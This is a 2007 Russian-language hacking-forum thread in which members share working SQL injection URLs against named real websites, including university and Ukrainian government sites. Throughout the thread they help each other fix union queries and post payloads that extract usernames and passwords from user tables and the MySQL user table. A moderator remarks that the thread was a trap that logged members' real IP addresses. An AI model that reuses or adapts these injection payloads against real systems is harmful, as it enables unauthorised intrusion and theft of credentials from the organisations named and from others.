HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.03.2007, 12:42
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами: 10669286

Репутация: 1942


По умолчанию

это был не пример просто ты помоему незнаеш назначения sql inj или путаеш его с php inj
http://www.funisland.com/gamelist.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
 
Ответить с цитированием

  #2  
Старый 14.03.2007, 14:50
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
С нами: 10978946

Репутация: 714


По умолчанию

Объяните пожайлуста, зачем ломать русские сайты??

Просьба к модераторам, выложить здесь ники со следующими Ip:


[censored!]

PS. Если ломаете, то хотя бы думайте головой, а не задницей.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

Последний раз редактировалось Elekt; 14.03.2007 в 15:35..
 
Ответить с цитированием

  #3  
Старый 14.03.2007, 15:20
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
С нами: 10467746

Репутация: 4738


По умолчанию

_http://www.caucaz.com/home_eng/breve_contenu.php?id=1+union+select+1,version(),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29/*

Вывод второго поля смотрим внизу, слева над WRITTEN BY
 
Ответить с цитированием

  #4  
Старый 14.03.2007, 15:38
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
С нами: 10752806

Репутация: 1202


По умолчанию

Вас проверяли на основы анонимной работы в сети.
Сегодня это были наши мемберы, а завтра это могут быть ребята из органов.

Делаем выводы.

Под реальными айпи замечены: Ksander,Colkru,\6/

ЗЫ: бага, сервак и логи - настоящие. И проблемы у Вас ещё могут быть.

Последний раз редактировалось Elekt; 14.03.2007 в 15:48.. Причина: тему зря закрыл, сори
 
Ответить с цитированием

  #5  
Старый 14.03.2007, 18:00
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
С нами: 10715512

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Цитата:
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+admins/*
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+users/*
поля так и несмог подобрать(

Цитата:
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=7+union+select+nu ll,null,null--
кто заняет как обойти несоответствие
Цитата:
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=7+union+select+1, 2,3--
ERROR: UNION types character varying and integer cannot be matched
 
Ответить с цитированием

  #6  
Старый 14.03.2007, 21:03
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

Цитата:
Сообщение от VampiRUS  
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=7+union+select+1, 2,3--
ERROR: UNION types character varying and integer cannot be matched
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=-40+union+select+null,TABLE_NAME,null+FROM+INFORMAT ION_SCHEMA.TABLES--
но хз как перебирать

Последний раз редактировалось }{0TT@БЬ)Ч; 14.03.2007 в 21:06..
 
Ответить с цитированием

  #7  
Старый 14.03.2007, 18:03
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

VampiRUS
по идее convert(version(),char)
 
Ответить с цитированием

  #8  
Старый 14.03.2007, 18:32
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
С нами: 10866626

Репутация: 4268


По умолчанию

Все топики не смотрел, так что если уже есть, сорри. Привет первонаху _http://www.gay-nn.ru/?aquery=news&id=-106+UNION+SELECT+1,2,3,4,5,6,7,8/* =)
 
Ответить с цитированием

  #9  
Старый 14.03.2007, 18:40
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

2VampiRUS
Цитата:
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+admins/*
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+users/*
да ты и таблицы не подобрал)) нужно union+select+*+from+table_name/*

вот -

Код:
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11,12,13,14,15,16,17,18,19+from+users/*
зы 16 юзеров, перебирать limit'ом

Последний раз редактировалось n0ne; 14.03.2007 в 18:46..
 
Ответить с цитированием

  #10  
Старый 14.03.2007, 18:48
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами: 10085717

Репутация: 590
По умолчанию

www.loga.gov.ua
PHP код:
http://www.loga.gov.ua/ua/news/todrug.php?id=-8809+union+select+concat(password,0x3a,user)+from+mysql.user/* 
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.